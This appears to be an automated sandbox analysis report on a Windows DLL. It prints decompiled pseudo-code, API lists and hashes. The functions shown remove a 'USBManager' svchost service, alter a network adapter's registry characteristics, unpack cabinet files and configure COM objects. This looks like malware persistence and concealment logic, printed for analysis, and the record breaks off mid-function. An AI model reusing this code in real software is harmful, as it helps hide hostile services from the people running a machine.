                                                                                                                        • Opcode Fuzzy Hash: 2dda20ddb9e3a5e4c6f93f7d993a011760b35b1ea0e7c07fd96946657ab8e5f8
                                                                                                                        • Instruction Fuzzy Hash: 30312773E08BB4BBDA20D7648C48F9B766CEB46732F10411AF614E61C0CB759821CBA5
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 6F333930, Relevance: 26.4, APIs: 13, Strings: 2, Instructions: 102memorystringCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        C-Code - Quality: 97%
                                                                                                                        			E6F333930(void* __ebx, void* _a4) {
				long _v4;
				long _v8;
				CHAR* _t22;
				long _t26;
				int _t33;
				void* _t34;
				void* _t47;
				signed int _t53;
				void* _t54;
				WCHAR* _t56;
				long* _t59;

				if(_a4 == 0) {
					L19:
					return 0;
				}
				_t56 = HeapAlloc(GetProcessHeap(), 8, 0x20a);
				if(_t56 == 0) {
					L18:
					HeapFree(GetProcessHeap(), 0, _a4);
					goto L19;
				}
				_v4 = 0;
				_t22 = GetCommandLineA();
				_v8 = 0;
				_t47 = E6F33A3D0(_t22,  &_v8);
				_t59 =  &(( &_v8)[2]);
				if(_t47 == 0) {
					L17:
					HeapFree(GetProcessHeap(), 0, _t56);
					goto L18;
				}
				_t26 = _v8;
				if(_t26 <= 1) {
					L15:
					LocalFree(_t47);
					if(_v4 != 0) {
						_push( *_a4);
						E6F333610(_t56);
					}
					goto L17;
				} else {
					_t53 = 1;
					do {
						if(_t53 >= _t26 - 1) {
							goto L8;
						}
						if(lstrcmpiA( *(_t47 + _t53 * 4), "-svcr") == 0) {
							_t54 = E6F33A360( *((intOrPtr*)(_t47 + 4 + _t53 * 4)), 0, 0);
							_t59 =  &(_t59[3]);
							if(_t54 != 0) {
								_v4 = 1;
								_t33 = PathIsRelativeW(_t54);
								_t34 = M6F340520; // 0x996738
								if(_t33 == 0) {
									_t34 = 0x6f33d664;
								}
								wsprintfW(_t56, L"\"%s%s\"", _t34, _t54);
								_t59 =  &(_t59[4]);
								HeapFree(GetProcessHeap(), 0, _t54);
							}
							L14:
							goto L15;
						}
						_t26 = _v8;
						L8:
						_t53 = _t53 + 1;
					} while (_t53 < _t26);
					goto L14;
				}
			}














                                                                                                                        0x6f333938
                                                                                                                        0x6f333a62
                                                                                                                        0x6f333a67
                                                                                                                        0x6f333a67
                                                                                                                        0x6f333956
                                                                                                                        0x6f33395a
                                                                                                                        0x6f333a50
                                                                                                                        0x6f333a5a
                                                                                                                        0x00000000
                                                                                                                        0x6f333a61
                                                                                                                        0x6f333961
                                                                                                                        0x6f333969
                                                                                                                        0x6f333975
                                                                                                                        0x6f333982
                                                                                                                        0x6f333984
                                                                                                                        0x6f333989
                                                                                                                        0x6f333a3d
                                                                                                                        0x6f333a49
                                                                                                                        0x00000000
                                                                                                                        0x6f333a4f
                                                                                                                        0x6f33398f
                                                                                                                        0x6f333996
                                                                                                                        0x6f333a1f
                                                                                                                        0x6f333a20
                                                                                                                        0x6f333a2b
                                                                                                                        0x6f333a33
                                                                                                                        0x6f333a35
                                                                                                                        0x6f333a3a
                                                                                                                        0x00000000
                                                                                                                        0x6f33399c
                                                                                                                        0x6f3339a3
                                                                                                                        0x6f3339a8
                                                                                                                        0x6f3339ad
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x6f3339bc
                                                                                                                        0x6f3339d7
                                                                                                                        0x6f3339d9
                                                                                                                        0x6f3339de
                                                                                                                        0x6f3339e1
                                                                                                                        0x6f3339e9
                                                                                                                        0x6f3339f1
                                                                                                                        0x6f3339f6
                                                                                                                        0x6f3339f8
                                                                                                                        0x6f3339f8
                                                                                                                        0x6f333a05
                                                                                                                        0x6f333a0b
                                                                                                                        0x6f333a18
                                                                                                                        0x6f333a18
                                                                                                                        0x6f333a1e
                                                                                                                        0x00000000
                                                                                                                        0x6f333a1e
                                                                                                                        0x6f3339be
                                                                                                                        0x6f3339c2
                                                                                                                        0x6f3339c2
                                                                                                                        0x6f3339c3
                                                                                                                        0x00000000
                                                                                                                        0x6f3339c7

                                                                                                                        APIs
                                                                                                                        • GetProcessHeap.KERNEL32(00000008,0000020A), ref: 6F33394D
                                                                                                                        • HeapAlloc.KERNEL32(00000000), ref: 6F333950
                                                                                                                        • GetCommandLineA.KERNEL32 ref: 6F333969
                                                                                                                          • Part of subcall function 6F33A3D0: lstrlenA.KERNEL32(?,?,?,?,00000000,?), ref: 6F33A3DB
                                                                                                                          • Part of subcall function 6F33A3D0: LocalAlloc.KERNEL32(00000040,00000004,?,?,?,00000000,?), ref: 6F33A3F4
                                                                                                                        • lstrcmpiA.KERNEL32(?,-svcr), ref: 6F3339B8
                                                                                                                        • PathIsRelativeW.SHLWAPI ref: 6F3339E9
                                                                                                                        • wsprintfW.USER32 ref: 6F333A05
                                                                                                                        • GetProcessHeap.KERNEL32(00000000,00000000,?,?,?,00000000), ref: 6F333A11
                                                                                                                        • HeapFree.KERNEL32(00000000,?,?,?,00000000), ref: 6F333A18
                                                                                                                        • LocalFree.KERNEL32(00000000), ref: 6F333A20
                                                                                                                        • GetProcessHeap.KERNEL32(00000000,00000000), ref: 6F333A46
                                                                                                                        • HeapFree.KERNEL32(00000000), ref: 6F333A49
                                                                                                                        • GetProcessHeap.KERNEL32(00000000,?), ref: 6F333A57
                                                                                                                        • HeapFree.KERNEL32(00000000), ref: 6F333A5A
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.410946846.000000006F331000.00000020.00020000.sdmp, Offset: 6F330000, based on PE: true
                                                                                                                        • Associated: 00000002.00000002.410929497.000000006F330000.00000002.00020000.sdmp Download File
                                                                                                                        • Associated: 00000002.00000002.410968304.000000006F33D000.00000002.00020000.sdmp Download File
                                                                                                                        • Associated: 00000002.00000002.411025550.000000006F340000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000002.00000002.411060259.000000006F341000.00000002.00020000.sdmp Download File
                                                                                                                        Similarity
                                                                                                                        • API ID: Heap$FreeProcess$AllocLocal$CommandLinePathRelativelstrcmpilstrlenwsprintf
                                                                                                                        • String ID: "%s%s"$-svcr
                                                                                                                        • API String ID: 3712600073-2880469085
                                                                                                                        • Opcode ID: 41ac2d30ff39329dcc7d6feb90e40ccfb6124d89250d8f65a1b0d21e0cf0903c
                                                                                                                        • Instruction ID: f1d01fbdc56259cf6174f3107a5da33c84d4c0a8dae534f5d499deeda9a8a1b6
                                                                                                                        • Opcode Fuzzy Hash: 41ac2d30ff39329dcc7d6feb90e40ccfb6124d89250d8f65a1b0d21e0cf0903c
                                                                                                                        • Instruction Fuzzy Hash: C731D033D047A9EBDB10DB64CC4AF5ABBADEB46321F008519F855D7140D7B5E814CBA2
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 6F334130, Relevance: 24.6, APIs: 8, Strings: 6, Instructions: 75registryCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        C-Code - Quality: 100%
                                                                                                                        			E6F334130() {
				char _v248;
				char _v256;
				void* _v260;
				char _v264;
				void* _t11;
				intOrPtr _t12;
				intOrPtr _t18;
				void* _t37;
				void* _t38;

				_t11 = E6F333700("USBManager", 1);
				_t38 = _t37 + 8;
				if(_t11 == 0) {
					return _t11;
				}
				if(M6F340544 != 0) {
					_t18 =  *0x6f34047c; // 0x998bd0
					wsprintfA( &_v264, "%s\\%s%c%s", _t18, "svchost", 0, 0x6f33d543);
					_t38 = _t38 + 0x18;
					_v260 = 0;
					if(RegCreateKeyExA(0x80000002,  &_v256, 0, 0, 0, 0xf023f, 0,  &_v260, 0) == 0) {
						RegDeleteValueA(_v260, "USBManager");
						RegCloseKey(_v260);
					}
				}
				_t12 =  *0x6f34047c; // 0x998bd0
				wsprintfA( &_v264, "%s\\%s%c%s", _t12, "svchost", 0x5c, "USBPortsManagerGrp");
				RegDeleteKeyA(0x80000002,  &_v256);
				wsprintfA( &_v256, "SYSTEM\\CurrentControlSet%s%s%s", "\\Services\\", "USBManager", 0x6f33d543);
				return RegDeleteKeyA(0x80000002,  &_v248);
			}












                                                                                                                        0x6f33413d
                                                                                                                        0x6f334142
                                                                                                                        0x6f334147
                                                                                                                        0x6f33422f
                                                                                                                        0x6f33422f
                                                                                                                        0x6f33415c
                                                                                                                        0x6f33415e
                                                                                                                        0x6f33417a
                                                                                                                        0x6f33417c
                                                                                                                        0x6f33419d
                                                                                                                        0x6f3341ad
                                                                                                                        0x6f3341b9
                                                                                                                        0x6f3341c4
                                                                                                                        0x6f3341c4
                                                                                                                        0x6f3341ad
                                                                                                                        0x6f3341ca
                                                                                                                        0x6f3341e6
                                                                                                                        0x6f3341fb
                                                                                                                        0x6f334216
                                                                                                                        0x00000000

                                                                                                                        APIs
                                                                                                                          • Part of subcall function 6F333700: OpenSCManagerA.ADVAPI32(00000000,00000000,000F003F), ref: 6F333719
                                                                                                                          • Part of subcall function 6F333700: OpenSCManagerA.ADVAPI32(00000000,00000000,00000001), ref: 6F333725
                                                                                                                          • Part of subcall function 6F333700: OpenServiceA.ADVAPI32(00000000,?,000F01FF), ref: 6F33373D
                                                                                                                          • Part of subcall function 6F333700: QueryServiceStatus.ADVAPI32(00000000,?), ref: 6F33374F
                                                                                                                          • Part of subcall function 6F333700: ControlService.ADVAPI32(00000000,00000001,?), ref: 6F333764
                                                                                                                          • Part of subcall function 6F333700: QueryServiceStatus.ADVAPI32(00000000,?), ref: 6F33377C
                                                                                                                          • Part of subcall function 6F333700: Sleep.KERNEL32(000003E8), ref: 6F33378E
                                                                                                                          • Part of subcall function 6F333700: CloseServiceHandle.ADVAPI32(00000000), ref: 6F3337B5
                                                                                                                          • Part of subcall function 6F333700: CloseServiceHandle.ADVAPI32(00000000), ref: 6F3337C0
                                                                                                                        • wsprintfA.USER32 ref: 6F33417A
                                                                                                                        • RegCreateKeyExA.ADVAPI32 ref: 6F3341A5
                                                                                                                        • RegDeleteValueA.ADVAPI32(?,USBManager), ref: 6F3341B9
                                                                                                                        • RegCloseKey.ADVAPI32(?), ref: 6F3341C4
                                                                                                                        • wsprintfA.USER32 ref: 6F3341E6
                                                                                                                        • RegDeleteKeyA.ADVAPI32(80000002,?), ref: 6F3341FB
                                                                                                                        • wsprintfA.USER32 ref: 6F334216
                                                                                                                        • RegDeleteKeyA.ADVAPI32(80000002,?), ref: 6F334225
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.410946846.000000006F331000.00000020.00020000.sdmp, Offset: 6F330000, based on PE: true
                                                                                                                        • Associated: 00000002.00000002.410929497.000000006F330000.00000002.00020000.sdmp Download File
                                                                                                                        • Associated: 00000002.00000002.410968304.000000006F33D000.00000002.00020000.sdmp Download File
                                                                                                                        • Associated: 00000002.00000002.411025550.000000006F340000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000002.00000002.411060259.000000006F341000.00000002.00020000.sdmp Download File
                                                                                                                        Similarity
                                                                                                                        • API ID: Service$CloseDeleteOpenwsprintf$HandleManagerQueryStatus$ControlCreateSleepValue
                                                                                                                        • String ID: %s\%s%c%s$SYSTEM\CurrentControlSet%s%s%s$USBManager$USBPortsManagerGrp$\Services\$svchost
                                                                                                                        • API String ID: 2810420714-3733378816
                                                                                                                        • Opcode ID: 2af24fc87cf750e879305d1b3360cf1f72dafd56b1c51f6fd63cda0596b0a156
                                                                                                                        • Instruction ID: 2f59b7d4d38ac84626ff918008f14b1f1464015837a2f811c3e197cbb679d29c
                                                                                                                        • Opcode Fuzzy Hash: 2af24fc87cf750e879305d1b3360cf1f72dafd56b1c51f6fd63cda0596b0a156
                                                                                                                        • Instruction Fuzzy Hash: 2B21E7B3E007A8BBE610DF60CC41FAB37ADEB94719F00850CF65466180E675F518CBAA
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 6F334300, Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 149registrystringCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        C-Code - Quality: 100%
                                                                                                                        			E6F334300() {
				char _v264;
				char _v364;
				int _v368;
				int _v372;
				char _v376;
				int _v380;
				int _v384;
				char _v388;
				int _v392;
				int _v396;
				int _v400;
				void* _v404;
				void* _v408;
				int _t49;
				int _t66;
				char* _t68;
				CHAR* _t83;
				int _t90;

				_t68 = M6F340584; // 0x751730
				_t90 = 0;
				_v404 = 0;
				if(RegOpenKeyExA(0x80000002, _t68, 0, 0xf003f,  &_v404) != 0) {
					L18:
					return _t90;
				}
				_v396 = 0;
				_v372 = 0;
				_v368 = 0;
				_v384 = 0;
				if(RegQueryInfoKeyA(_v404, 0, 0, 0,  &_v396,  &_v372, 0,  &_v368,  &_v384, 0, 0, 0) != 0) {
					L17:
					RegCloseKey(_v404);
					goto L18;
				}
				_t49 = _v396;
				if(_t49 <= 0) {
					goto L17;
				}
				_t66 = 0;
				if(_t49 <= 0) {
					L16:
					goto L17;
				} else {
					do {
						_v380 = 0x104;
						if(RegEnumKeyExA(_v404, _t66,  &_v264,  &_v380, 0, 0, 0, 0) != 0) {
							goto L14;
						}
						_v408 = 0;
						if(RegOpenKeyExA(_v404,  &_v264, 0, 0x2001b,  &_v408) != 0) {
							goto L14;
						}
						_v392 = 1;
						_v400 = 0x64;
						if(RegQueryValueExA(_v408, "ComponentId", 0,  &_v392,  &_v364,  &_v400) == 0) {
							_t83 = M6F3404D8; // 0x99b240
							if(lstrcmpiA( &_v364, _t83) == 0) {
								_v400 = 4;
								_v392 = 4;
								_v388 = 0;
								if(RegQueryValueExA(_v408, "Characteristics", 0,  &_v392,  &_v388,  &_v400) == 0) {
									_v376 = 0x89;
									if(_v388 == 0x89 || RegSetValueExA(_v408, "Characteristics", 0, 4,  &_v376, 4) == 0) {
										_t90 = 1;
									}
								}
							}
						}
						CloseHandle(_v408);
						if(_t90 != 0) {
							break;
						}
						L14:
						_t66 = _t66 + 1;
					} while (_t66 < _v396);
					goto L16;
				}
			}





















                                                                                                                        0x6f334306
                                                                                                                        0x6f334321
                                                                                                                        0x6f334323
                                                                                                                        0x6f33432f
                                                                                                                        0x6f3344b9
                                                                                                                        0x6f3344c2
                                                                                                                        0x6f3344c2
                                                                                                                        0x6f334355
                                                                                                                        0x6f334359
                                                                                                                        0x6f33435d
                                                                                                                        0x6f334361
                                                                                                                        0x6f33436d
                                                                                                                        0x6f3344ad
                                                                                                                        0x6f3344b2
                                                                                                                        0x00000000
                                                                                                                        0x6f3344b2
                                                                                                                        0x6f334373
                                                                                                                        0x6f334379
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x6f334380
                                                                                                                        0x6f334384
                                                                                                                        0x6f3344ac
                                                                                                                        0x00000000
                                                                                                                        0x6f33438a
                                                                                                                        0x6f334391
                                                                                                                        0x6f3343a8
                                                                                                                        0x6f3343b8
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x6f3343d6
                                                                                                                        0x6f3343e2
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x6f334402
                                                                                                                        0x6f33440a
                                                                                                                        0x6f334416
                                                                                                                        0x6f334418
                                                                                                                        0x6f33442c
                                                                                                                        0x6f334441
                                                                                                                        0x6f334445
                                                                                                                        0x6f334455
                                                                                                                        0x6f33445d
                                                                                                                        0x6f334464
                                                                                                                        0x6f33446c
                                                                                                                        0x6f33448c
                                                                                                                        0x6f33448c
                                                                                                                        0x6f33446c
                                                                                                                        0x6f33445d
                                                                                                                        0x6f33442c
                                                                                                                        0x6f334496
                                                                                                                        0x6f33449e
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x6f3344a0
                                                                                                                        0x6f3344a0
                                                                                                                        0x6f3344a1
                                                                                                                        0x00000000
                                                                                                                        0x6f3344ab

                                                                                                                        APIs
                                                                                                                        • RegOpenKeyExA.ADVAPI32(80000002,00751730,00000000,000F003F,?), ref: 6F334327
                                                                                                                        • RegQueryInfoKeyA.ADVAPI32(?,00000000,00000000,00000000,?,?,00000000,?,?,00000000,00000000,00000000), ref: 6F334365
                                                                                                                        • RegEnumKeyExA.ADVAPI32 ref: 6F3343B0
                                                                                                                        • RegOpenKeyExA.ADVAPI32(00000000,?,00000000,0002001B,?), ref: 6F3343DA
                                                                                                                        • RegQueryValueExA.ADVAPI32(00000000,ComponentId,00000000,?,?,00000000), ref: 6F334412
                                                                                                                        • lstrcmpiA.KERNEL32(?,0099B240), ref: 6F334424
                                                                                                                        • RegQueryValueExA.ADVAPI32(00000000,Characteristics,00000000,?,?,00000000), ref: 6F334459
                                                                                                                        • RegSetValueExA.ADVAPI32(?,Characteristics,00000000,00000004,?,00000004), ref: 6F334482
                                                                                                                        • CloseHandle.KERNEL32(?), ref: 6F334496
                                                                                                                        • RegCloseKey.ADVAPI32(?), ref: 6F3344B2
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.410946846.000000006F331000.00000020.00020000.sdmp, Offset: 6F330000, based on PE: true
                                                                                                                        • Associated: 00000002.00000002.410929497.000000006F330000.00000002.00020000.sdmp Download File
                                                                                                                        • Associated: 00000002.00000002.410968304.000000006F33D000.00000002.00020000.sdmp Download File
                                                                                                                        • Associated: 00000002.00000002.411025550.000000006F340000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000002.00000002.411060259.000000006F341000.00000002.00020000.sdmp Download File
                                                                                                                        Similarity
                                                                                                                        • API ID: QueryValue$CloseOpen$EnumHandleInfolstrcmpi
                                                                                                                        • String ID: Characteristics$ComponentId$d
                                                                                                                        • API String ID: 678791777-1822972205
                                                                                                                        • Opcode ID: 31d82e66935873b71812a413b74a5c9315cf185cd1fafc2d6f0e27d70917d8e5
                                                                                                                        • Instruction ID: 72e184dfbda02b7c6a03d0ee0fae8ea8f7c766a2a20a2d99791d41e314ad56d3
                                                                                                                        • Opcode Fuzzy Hash: 31d82e66935873b71812a413b74a5c9315cf185cd1fafc2d6f0e27d70917d8e5
                                                                                                                        • Instruction Fuzzy Hash: 8751E0B2608395AFD320DF55D884EABBBFDFBC9B14F00491DB68596104E772E5098B22
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 6F3312C0, Relevance: 18.1, APIs: 12, Instructions: 96filestringCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        C-Code - Quality: 50%
                                                                                                                        			E6F3312C0(char* _a4, intOrPtr _a8, intOrPtr _a12) {
				char _v264;
				char _v288;
				char _v300;
				intOrPtr _v304;
				char _v308;
				long _v312;
				char* _t18;
				void* _t20;
				char* _t28;
				char* _t32;
				char* _t40;
				void* _t42;
				intOrPtr _t43;
				long* _t48;

				_t18 =  &_v300;
				_push(_t18);
				_push(0xffffffff);
				_push(E6F3310E0);
				_push(E6F3310D0);
				_push(E6F3310A0);
				_push(E6F331070);
				_push(E6F331000);
				_push(E6F331050);
				_push(E6F331030);
				_v312 = 0;
				L6F33C3A2();
				_t40 = _t18;
				_t48 =  &(( &_v312)[9]);
				if(_t40 == 0) {
					return 0;
				} else {
					_t32 = _a4;
					_t20 = CreateFileA(_t32, 0xc0000000, 3, 0, 3, 0x80, 0);
					_t42 = _t20;
					if(_t42 != 0xffffffff) {
						_push( &_v288);
						_push(_t42);
						_push(_t40);
						L6F33C39C();
						_t48 =  &(_t48[3]);
						CloseHandle(_t42);
						if(_t20 != 0) {
							_t43 = _a12;
							if(_t43 != 0) {
								_v312 = GetTickCount();
								 *0x6f340270 = RtlRandom( &_v312);
							}
							lstrcpyA( &_v264, _t32);
							PathRemoveFileSpecA( &_v264);
							PathAddBackslashA( &_v264);
							_push( &_v308);
							_push(0);
							_push(E6F331100);
							_push(0);
							_push( &_v264);
							_v304 = _a8;
							_v308 = _t43;
							_t28 = PathFindFileNameA(_t32);
							_push(_t28);
							_push(_t40);
							L6F33C396();
							_t48 =  &(_t48[7]);
							_v312 = _t28;
						}
					}
					_push(_t40);
					L6F33C390();
					return _v312;
				}
			}

















                                                                                                                        0x6f3312c8
                                                                                                                        0x6f3312cc
                                                                                                                        0x6f3312cd
                                                                                                                        0x6f3312cf
                                                                                                                        0x6f3312d4
                                                                                                                        0x6f3312d9
                                                                                                                        0x6f3312de
                                                                                                                        0x6f3312e3
                                                                                                                        0x6f3312e8
                                                                                                                        0x6f3312ef
                                                                                                                        0x6f3312f4
                                                                                                                        0x6f3312f8
                                                                                                                        0x6f3312fd
                                                                                                                        0x6f3312ff
                                                                                                                        0x6f331304
                                                                                                                        0x6f3313f1
                                                                                                                        0x6f33130a
                                                                                                                        0x6f33130b
                                                                                                                        0x6f331323
                                                                                                                        0x6f331329
                                                                                                                        0x6f33132e
                                                                                                                        0x6f331339
                                                                                                                        0x6f33133a
                                                                                                                        0x6f33133b
                                                                                                                        0x6f33133c
                                                                                                                        0x6f331341
                                                                                                                        0x6f331347
                                                                                                                        0x6f331350
                                                                                                                        0x6f331352
                                                                                                                        0x6f33135b
                                                                                                                        0x6f331368
                                                                                                                        0x6f331372
                                                                                                                        0x6f331372
                                                                                                                        0x6f33137d
                                                                                                                        0x6f331388
                                                                                                                        0x6f331393
                                                                                                                        0x6f3313a4
                                                                                                                        0x6f3313a5
                                                                                                                        0x6f3313a7
                                                                                                                        0x6f3313ac
                                                                                                                        0x6f3313b2
                                                                                                                        0x6f3313b4
                                                                                                                        0x6f3313b8
                                                                                                                        0x6f3313bc
                                                                                                                        0x6f3313c2
                                                                                                                        0x6f3313c3
                                                                                                                        0x6f3313c4
                                                                                                                        0x6f3313c9
                                                                                                                        0x6f3313cc
                                                                                                                        0x6f3313cc
                                                                                                                        0x6f331350
                                                                                                                        0x6f3313d0
                                                                                                                        0x6f3313d1
                                                                                                                        0x6f3313e6
                                                                                                                        0x6f3313e6

                                                                                                                        APIs
                                                                                                                        • #20.CABINET(Function_00001030,Function_00001050,Function_00001000,Function_00001070,Function_000010A0,Function_000010D0,Function_000010E0,000000FF,?), ref: 6F3312F8
                                                                                                                        • CreateFileA.KERNEL32(?,C0000000,00000003,00000000,00000003,00000080,00000000), ref: 6F331323
                                                                                                                        • #21.CABINET(00000000,00000000,?), ref: 6F33133C
                                                                                                                        • CloseHandle.KERNEL32(00000000), ref: 6F331347
                                                                                                                        • GetTickCount.KERNEL32 ref: 6F33135D
                                                                                                                        • RtlRandom.NTDLL(?), ref: 6F33136C
                                                                                                                        • lstrcpyA.KERNEL32(?,?), ref: 6F33137D
                                                                                                                        • PathRemoveFileSpecA.SHLWAPI(?), ref: 6F331388
                                                                                                                        • PathAddBackslashA.SHLWAPI(?), ref: 6F331393
                                                                                                                        • PathFindFileNameA.SHLWAPI(?,?,00000000,Function_00001100,00000000,?), ref: 6F3313BC
                                                                                                                        • #22.CABINET(00000000,00000000), ref: 6F3313C4
                                                                                                                        • #23.CABINET(00000000), ref: 6F3313D1
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.410946846.000000006F331000.00000020.00020000.sdmp, Offset: 6F330000, based on PE: true
                                                                                                                        • Associated: 00000002.00000002.410929497.000000006F330000.00000002.00020000.sdmp Download File
                                                                                                                        • Associated: 00000002.00000002.410968304.000000006F33D000.00000002.00020000.sdmp Download File
                                                                                                                        • Associated: 00000002.00000002.411025550.000000006F340000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000002.00000002.411060259.000000006F341000.00000002.00020000.sdmp Download File
                                                                                                                        Similarity
                                                                                                                        • API ID: FilePath$BackslashCloseCountCreateFindHandleNameRandomRemoveSpecTicklstrcpy
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 4034828233-0
                                                                                                                        • Opcode ID: 47e4c7f28988348b9eab2d98d20e0cd3595617a1023614436fd285e0bd34a44e
                                                                                                                        • Instruction ID: cd652085a27cf96906f9469b9a9188b614a61b72a552f45f733ec9de68303c36
                                                                                                                        • Opcode Fuzzy Hash: 47e4c7f28988348b9eab2d98d20e0cd3595617a1023614436fd285e0bd34a44e
                                                                                                                        • Instruction Fuzzy Hash: 5731D473D043A46FC620EB65DC44FAFB7ACAB85770F004A1DF59893180EB75E5148BA6
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 6F334760, Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 250memorycomstringCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        C-Code - Quality: 54%
                                                                                                                        			E6F334760() {
				char _v8;
				char _v12;
				char _v16;
				char _v24;
				intOrPtr _v28;
				signed int _v32;
				char _v36;
				void* _v44;
				intOrPtr _v48;
				void* _v52;
				intOrPtr _v60;
				char _v64;
				intOrPtr* _v68;
				char _v76;
				intOrPtr _v80;
				void* _v84;
				WCHAR* _v92;
				intOrPtr* _v104;
				intOrPtr* _v112;
				intOrPtr* _v120;
				intOrPtr* _v128;
				intOrPtr* _v136;
				intOrPtr* _v144;
				intOrPtr* _v148;
				intOrPtr _v152;
				intOrPtr* _v160;
				char* _t80;
				intOrPtr* _t82;
				intOrPtr* _t85;
				intOrPtr* _t88;
				intOrPtr* _t92;
				intOrPtr* _t95;
				char* _t98;
				intOrPtr _t99;
				intOrPtr* _t100;
				intOrPtr* _t102;
				intOrPtr* _t104;
				intOrPtr* _t106;
				intOrPtr* _t108;
				intOrPtr* _t110;
				intOrPtr* _t112;
				intOrPtr* _t115;
				intOrPtr* _t117;
				intOrPtr* _t120;
				int _t123;
				intOrPtr* _t124;
				intOrPtr* _t126;
				WCHAR* _t128;
				intOrPtr* _t130;
				intOrPtr* _t132;
				signed int _t134;
				intOrPtr* _t138;
				intOrPtr* _t161;
				char _t185;
				void* _t186;
				char _t189;
				char _t190;
				signed int* _t191;
				WCHAR* _t194;

				_t80 =  &_v16;
				_t185 = 0;
				_v12 = 0;
				_v8 = 0;
				_v16 = 0;
				__imp__CoCreateInstance(0x6f33e0bc, 0, 1, 0x6f33e07c, _t80);
				if(_t80 < 0) {
					L35:
					return _v32;
				}
				_t82 = _v36;
				_v24 = 0;
				_push( &_v24);
				_push(_t82);
				if( *((intOrPtr*)( *((intOrPtr*)( *_t82 + 0x1c))))() < 0) {
					L10:
					_t85 = _v44;
					_v52 = _t185;
					_push( &_v52);
					_push(_t85);
					if( *((intOrPtr*)( *((intOrPtr*)( *_t85 + 0x48))))() < 0) {
						L34:
						_t88 = _v52;
						 *((intOrPtr*)( *((intOrPtr*)( *_t88 + 8))))(_t88);
						if(_v48 != _t185) {
							return 1;
						}
						goto L35;
					}
					_t138 = __imp__#2;
					_t194 =  *_t138(_v28);
					if(_t194 == _t185) {
						L33:
						_t92 = _v64;
						 *((intOrPtr*)( *((intOrPtr*)( *_t92 + 8))))(_t92);
						goto L34;
					}
					_t186 =  *_t138(_v28);
					_t189 = 0;
					if(_t186 == 0) {
						L32:
						__imp__#6(_t194);
						_t185 = 0;
						goto L33;
					}
					_t95 = _v68;
					_push( &_v64);
					_v64 = 0;
					_push(_t186);
					_push(_t95);
					if( *((intOrPtr*)( *((intOrPtr*)( *_t95 + 0x28))))() < 0) {
						L21:
						if(_v52 != _t189) {
							_t98 =  &_v84;
							_v84 = _t189;
							__imp__CoCreateInstance(0x6f33e09c, _t189, 1, 0x6f33e06c, _t98);
							if(_t98 >= 0) {
								_t99 = _v60;
								if(_t99 != 0) {
									_t189 =  *_t138(_t99);
								}
								_t100 = _v104;
								 *((intOrPtr*)( *((intOrPtr*)( *_t100 + 0x30))))(_t100, _t194);
								_t102 = _v112;
								 *((intOrPtr*)( *((intOrPtr*)( *_t102 + 0x20))))(_t102, _t186);
								if(_t189 != 0) {
									_t117 = _v120;
									 *((intOrPtr*)( *((intOrPtr*)( *_t117 + 0x28))))(_t117, _t189);
								}
								_t104 = _v120;
								 *((intOrPtr*)( *((intOrPtr*)( *_t104 + 0x40))))(_t104, 0x100);
								_t106 = _v128;
								 *((intOrPtr*)( *((intOrPtr*)( *_t106 + 0x98))))(_t106, 0x7fffffff);
								_t108 = _v136;
								 *((intOrPtr*)( *((intOrPtr*)( *_t108 + 0xa8))))(_t108, 1);
								_t110 = _v144;
								 *((intOrPtr*)( *((intOrPtr*)( *_t110 + 0x88))))(_t110, 0xffffffff);
								_t112 = _v148;
								_push(_v152);
								_push(_t112);
								if( *((intOrPtr*)( *((intOrPtr*)( *_t112 + 0x20))))() >= 0) {
									_v144 = 1;
								}
								_t115 = _v160;
								 *((intOrPtr*)( *((intOrPtr*)( *_t115 + 8))))(_t115);
								if(_t189 != 0) {
									__imp__#6(_t189);
								}
							}
						}
						L31:
						__imp__#6(_t186);
						goto L32;
					}
					_t120 = _v76;
					_v84 = 0;
					 *((intOrPtr*)( *((intOrPtr*)( *_t120 + 0x2c))))(_t120,  &_v84);
					_t123 = lstrcmpiW(_t194, _v92);
					_t190 = _v44;
					if(_t123 == 0) {
						if(_t190 == 0) {
							_t130 = _v84;
							_v76 = _t190;
							 *((intOrPtr*)( *((intOrPtr*)( *_t130 + 0x84))))(_t130,  &_v76);
							if(_v84 == _t190) {
								_t132 = _v92;
								 *((intOrPtr*)( *((intOrPtr*)( *_t132 + 0x88))))(_t132, 0xffffffff);
							}
						}
						_v76 = 1;
					}
					_t124 = _v84;
					 *((intOrPtr*)( *((intOrPtr*)( *_t124 + 8))))(_t124);
					if(_v80 != 0) {
						if(_t190 != 0) {
							_t126 = _v92;
							 *((intOrPtr*)( *((intOrPtr*)( *_t126 + 0x24))))(_t126, _t186);
						}
						goto L31;
					} else {
						_t128 = _v92;
						 *((intOrPtr*)( *((intOrPtr*)( *_t128 + 0x24))))(_t128, _t186);
						_t189 = 0;
						goto L21;
					}
				} else {
					_t191 = 0x6f33d820;
					do {
